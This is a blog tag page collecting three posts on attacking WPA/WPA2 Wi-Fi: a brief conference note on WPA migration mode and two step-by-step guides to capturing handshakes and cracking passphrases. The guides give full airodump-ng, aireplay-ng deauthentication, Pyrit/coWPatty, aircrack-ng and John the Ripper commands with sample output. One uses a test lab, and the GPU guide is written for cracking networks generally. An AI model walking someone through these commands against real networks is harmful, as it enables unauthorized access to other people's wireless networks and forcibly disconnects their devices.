RSSAll Entries Tagged With: "wpa"

WPA is hackable?

I attended a track at Blackhat last week whereby WPA can be hacked by using WEP. I know, it sounds quite ‘out there’ but it’s true. The good thing is this can only be done if WPA migration mode is still enabled. So, if you’ve done WPA migration recently, or even just to check to make sure – turn off WPA migration mode and you should be good to go.

Here’s a link to Core Labs presentation: WPA Migration Mode: WEP is back to haunt you…

admin | Aug 03, 2010 | Comments 0
Read More
Cracking WPA FAST with video cards

Cracking WPA FAST with video cards

From http://www.i-hacked.com – written by Notlist3d

By now, pretty much everyone has heard that it is easy to hack into WEP protected networks. As we have seen in our Cracking WEP article, it is terribly easy. (There have been advances in cracking WEP since that article was published, it is even easier now) Yeah, WiFi is inherently insecure, but we need it… Right? Well if you ask your local security guy how you can protect your home WiFi network, surely they will come back and say: “WPA or WPA2 cannot be cracked, use it”. They are wrong.

By simply installing a patch to your existing hardware, WPA came in as the “Saving Grace” for wireless networking. It corrected almost every security problem either created or ignored by WEP. However, WPA was not perfect. The method in which WPA initializes its encryption scheme is subject to capture and offline brute force attacks. Consequently, it’s actually easier to crack WPA which uses a weak password than it is to crack WEP. This article will walk you through the process of retreiving and cracking a WPA network key. In this guide I will skim over some of the powerful things that you can do with graphics cards. By focusing on my personal setup, you will see it can be done with limited off the shelf equipment.

The first decision is to decide what you want your setup to be. I personally chose to go with a setup using GeForce card with CUDA support (http://www.nvidia.com/object/cuda_learn_products.html ). You will need to check on the programs you want to use to make sure that they support the graphics card that you choose.

The setup I ultimately decided going with is an EVGA 780i motherboard that has dual SLI support (can support tri SLI). I ended up going with two GeForce GTX260 cards to utilize the SLI capability. I also upgraded my power supply to a Corsair 850W to power everything in my machine.

After building the setup, feel free to go play some games, then come back to this guide. I mean you have work to do!

The BackTrack 4 Pre-Release is a perfect platform for you to have some fun with your new setup. For a guide on configuring Backtrack 4 with CUDA and a in depth tutorial on CUDA tools, check out this 25 page guide on it by Pureh@te on the offensive-security website.

Finally lets take a look at my favorite GPU tool Pyrit, which will allow you to run a pass-through dictionary attack against WPA encryption (http://code.google.com/p/pyrit/) running it through coWPatty (http://www.willhackforsushi.com/Cowpatty.html).

Using this you can take a capture file with a WPA 4-way handshake and do a pass-through to try to crack it with your dictionary using coWPatty. Make sure you use a dictionary with words in length starting from 8 and ending in 63 letters long. Any longer or shorter is just a waste because of the requirements of WPA passphrase’s. One thing to keep in mind is that to be able to crack the passphrase you must have the passphrase in your dictionary file.

The first step will be to put your card into monitor mode. After that, fire up airodump. I happen to know the router BSSID and channel so here is what I did below.

airodump-ng -c (routers channel) – - bssid (routers bssid) -w (cap filename) interface

1-airodump-01

Airodump will then load up as shown below. You can see the router and data coming from it. You can see a client is connected, which is important since you will need to get the 4-way handshake to crack the WPA passphrase.

2-airodump-02

Next it is time to send a de-authentication packet to the client to make it reconnect to the router allowing you to grab that 4-way handshake.

Aireplay-ng -0 (de-authentication attack) 5 (number of de-authentication packets to send) -a (router bssid) -c (client essid) interface

3-aireplay-2

If all goes well, you will see in your airodump window in top right corner showing you have received a WPA handshake. I have circled it in red below. If you don’t see this just repeat the last step and de-authenticate the client again.

4-airodump-handshake

After that I like to make sure that my graphic cards are working properly. You can either run a benchmark or list cores in pyrit. In the below picture I show the benchmark option

To run benchmark: pyrit benchmark

To list cores: pyrit list_cores

5-pyrit-benchmark

Below is the command for running pyrit in a pass-through mode through coWPatty. The great thing about this is you can run it with your dictionary file and not mess around with making a rainbow table or anything. If you do not have a dictionary file for WPA, you can grab one from the backtrack repository. Command is as follows for the pass-through mode.

pyrit -e (router essid) -f (path to the dictionary file) passthrough | (path to coWPatty) -d – -s (router essid) -r (name of capture file)

Note: I had installed the latest version of coWPatty manually. The default location you would put after the pipe (|) in backtrack would be /pentest/wireless/cowpatty/cowpatty

6-pyrit

If all goes well you well, you will start to see it go through passphrases in your dictionary file as shown below.

7-pyrit-2

And if all goes well in the end, you will end up with a passphrase as shown below.

8-pyrit-final

It was able to run 15,479.28 passphrases per second, which is an amazing upgrade from the 300 something I was getting with my 2.0 GHz dual core processor. This is also using the stock graphic cards that are not over-clocked.

Credits:

Tools used:

Backtrack – http://www.remote-exploit.org/backtrack.html

Pyrit- http://code.google.com/p/pyrit/

Cowpatty- http://www.willhackforsushi.com/Cowpatty.html

Special thanks to Pureh@te /Offensive Security for the great guide on getting graphic cards set up in backtrack – http://www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdf

admin | Aug 05, 2009 | Comments 0
Read More

Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper

Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper

February 24th, 2009 |Author: Peter Van Eeckhoutte

Basic steps :

* Put interface in monitor mode
* Find wireless network (protected with WPA2 and a Pre Shared Key)
* Capture all packets
* Wait until you see a client and deauthenticate the client, so the handshake can be captured
* Crack the key using a dictionary file (or via John The Ripper)

I’ll use a Dlink DWL-G122 (USB) wireless network interface for this procedure. In backtrack4, this device is recognized as wlan0.

First, put the card in monitor mode :

root@bt:~# airmon-ng

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]

root@bt:~# airmon-ng start wlan0

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)

Ok, we can now use interface mon0

Let’s find a wireless network that uses WPA2 / PSK :

root@bt:~# airodump-ng mon0

CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Rate Lost Packets Probe

00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet

Stop airodump-ng and run it again, writing all packets to disk :

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

At this point, you have 2 options : either wait until a client connects and the 4-way handshake is complete, or deauthenticate an existing client and thus force it to reassociate. Time is money, so let’s force the deauthenticate. We need the bssid of the AP (-a) and the mac of a connected client (-c)

root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner

CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Rate Lost Packets Probe

00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230

Stop airodump-ng and make sure the files were created properly

root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

Form this point forward, you do not need to be anywhere near the wireless network. All cracking will happen offline, so you can stop airodump and other processes and even walk away from the AP. In fact, I would suggest to walk away and find yourself a cosy place where you can live, eat, sleep, etc…. Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very very long time. There are 2 ways of bruteforcing : one that is relatively fast but does not guarantee success and one that is very slow, but guarantees that you will find the key at some point in time

The first option is by using a worklist/drstionary file. A lot of these files can be found on the internet (e.g. www.theargon.com or on packetstorm (see the archives)), or can be generated with tools such as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the worklist and feed it the .cap fie that contains the WPA2 Handshake.

So if your wordlist is called word.lst (under /tmp/wordlists), you can run

aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In other words, you may get lucky and get the key very fast, or you may not get the key at all.
The second method (bruteforcing) will be successfull for sure, but it may take ages to complete. Keep in mind, a WPA2 key can be up to 64 characters, so in theory you would to build every password combination with all possible character sets and feed them into aircrack. If you want to use John The Ripper to create all possible password combinations and feed them into aircrack-ng, this is the command to use :

root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

(Note : the PSK in my testlab is only 8 characters, contains one uppercase character and 4 numbers). I will post the output when the key was cracked, including the time it required to crack the key.

That’s it

Update :after 20 hours of cracking, the key still has not been found. The system I’m using to crack the keys is not very fast, but let’s look at some facts :

8 characters, plain characters (lowercase and uppercase) or digits = each character in the key could has 26+26+10 (62) possible combinations. So the maximum number of combinations that need to be checked in the bruteforce process is 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 At about 600 keys per second on my “slow” system, it could take more than 101083382 hours to find the key (11539 year). I have stopped the cracking process as my machine is way too slow to crack the key while I’m still alive… So think about this when doing a WPA2 PSK Audit.

admin | Jul 08, 2009 | Comments 1
Read More